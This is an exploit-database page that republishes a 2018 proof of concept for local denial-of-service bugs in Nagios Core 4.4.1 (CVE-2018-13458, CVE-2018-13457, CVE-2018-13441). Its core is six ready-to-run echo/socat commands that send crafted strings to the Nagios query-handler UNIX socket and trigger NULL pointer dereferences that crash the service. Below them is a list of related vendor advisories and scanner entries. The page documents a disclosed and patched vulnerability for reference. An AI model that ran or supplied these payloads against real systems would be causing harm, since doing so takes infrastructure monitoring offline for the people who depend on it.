Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtFakhri Zulkifli1337DAY-ID-30770
HistoryJul 24, 2018 - 12:00 a.m.

Nagios Core 4.4.1 - Denial of Service Vulnerability

2018-07-2400:00:00
Fakhri Zulkifli
0day.today
43

0.003 Low

EPSS

Percentile

64.6%

JSON

Exploit for linux platform in category dos / poc

# Exploit Title: Nagios Core Multiple Local Denial of Service
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
 
 
qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
 
1. [CVE-2018-13458] qh_core
 
$ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh -
 
2. [CVE-2018-13457] qh_echo
 
$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -
 
3. [CVE-2018-13441] qh_help
 
$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh -

#  0day.today [2018-07-25]  #

Related

openvas 4
packetstorm 1
exploitpack 1
mageia 1
suse 2
nessus 3
exploitdb 1
fedora 2
osv 3
ubuntucve 3
prion 3
debiancve 3
alpinelinux 1
redhatcve 3
cve 3
openvas
openvas
Nagios Core < 4.4.2 'unix socket' Multiple Denial of Service Vulnerabilities
2018-07-13 00:00:00
Mageia: Security Advisory (MGASA-2019-0104)
2022-01-28 00:00:00
openSUSE: Security Advisory for nagios (openSUSE-SU-2020:0500-1)
2020-04-12 00:00:00
packetstorm
packetstorm
Nagios Core 4.4.1 Local Denial Of Service
2018-07-25 00:00:00
exploitpack
exploitpack
Nagios Core 4.4.1 - Denial of Service
2018-07-24 00:00:00
mageia
mageia
Updated nagios packages fix security vulnerability
2019-03-07 19:34:45
suse
suse
Security update for nagios (moderate)
2020-04-14 00:00:00
Security update for nagios (moderate)
2020-04-11 00:00:00
nessus
nessus
openSUSE Security Update : nagios (openSUSE-2020-500)
2020-04-14 00:00:00
Fedora 29 : nagios (2019-376ecc221c)
2019-01-30 00:00:00
Fedora 28 : nagios (2019-0b44528ff1)
2019-01-30 00:00:00
exploitdb
exploitdb
Nagios Core 4.4.1 - Denial of Service
2018-07-24 00:00:00
fedora
fedora
[SECURITY] Fedora 28 Update: nagios-4.4.3-1.fc28
2019-01-30 01:32:29
[SECURITY] Fedora 29 Update: nagios-4.4.3-1.fc29
2019-01-30 02:07:33
osv
osv
CVE-2018-13441
2018-07-12 18:29:00
CVE-2018-13457
2018-07-12 18:29:00
CVE-2018-13458
2018-07-12 18:29:00
ubuntucve
ubuntucve
CVE-2018-13441
2018-07-12 00:00:00
CVE-2018-13458
2018-07-12 00:00:00
CVE-2018-13457
2018-07-12 00:00:00
prion
prion
Null pointer dereference
2018-07-12 18:29:00
Null pointer dereference
2018-07-12 18:29:00
Null pointer dereference
2018-07-12 18:29:00
debiancve
debiancve
CVE-2018-13441
2018-07-12 18:29:00
CVE-2018-13457
2018-07-12 18:29:00
CVE-2018-13458
2018-07-12 18:29:00
alpinelinux
alpinelinux
CVE-2018-13441
2018-07-12 18:29:00
redhatcve
redhatcve
CVE-2018-13441
2019-01-10 17:20:24
CVE-2018-13458
2019-01-10 17:22:16
CVE-2018-13457
2019-01-10 17:21:30
cve
cve
CVE-2018-13441
2018-07-12 18:29:00
CVE-2018-13458
2018-07-12 18:29:00
CVE-2018-13457
2018-07-12 18:29:00

0.003 Low

EPSS

Percentile

64.6%

JSON
Related for 1337DAY-ID-30770
openvas4packetstorm1exploitpack1mageia1suse2nessus3exploitdb1fedora2osv3ubuntucve3prion3debiancve3alpinelinux1redhatcve3cve3